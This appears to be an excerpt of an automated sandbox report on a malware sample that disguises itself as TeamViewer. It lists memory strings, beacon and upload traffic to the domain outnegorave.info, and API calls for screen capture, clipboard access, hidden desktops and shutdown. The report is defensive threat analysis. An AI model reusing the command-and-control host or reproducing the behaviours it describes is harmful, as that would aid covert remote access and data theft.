Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308492112.000002A416240000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308218425.000002A416263000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: TeamViewer.exe, 00000006.00000003.384741307.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.371647867.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000006.00000003.389888887.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/#
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/(
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/V3e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/icrosoft
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties:3
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.368823662.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/4
Source: TeamViewer.exe, 00000006.00000003.378667233.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/;
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/=
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/W
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/lPanel.dll
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/mViewer
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/q
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/G
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/S
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/ntsSecure-Out)LMEMX
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310085553.000002A416213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.310305376.000002A416224000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmp	String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja

Source: unknown

HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85134Content-Type: multipart/form-data; boundary=--------3509900953User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: ping3.dyngate.com

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF5A00 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_6EAF5A00

Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF66E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,

3_2_6EAF66E0

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,

1_2_00405042

Protection of GUI:

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF9BD0 GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,

3_2_6EAF9BD0

System Summary:

Uses 32bit PE files

Source: 77Etc0bR2v.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040323C EntryPoint,73D1E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	1_2_0040323C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	3_2_6EAF5B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_6EAF5B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	8_2_6EAF5B40

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00404853	1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00406131	1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053C2D6	6_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004A13AA	6_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053E430	6_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004C97CD	6_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00534810	6_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_005438ED	6_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004AC8A9	6_2_004AC8A9
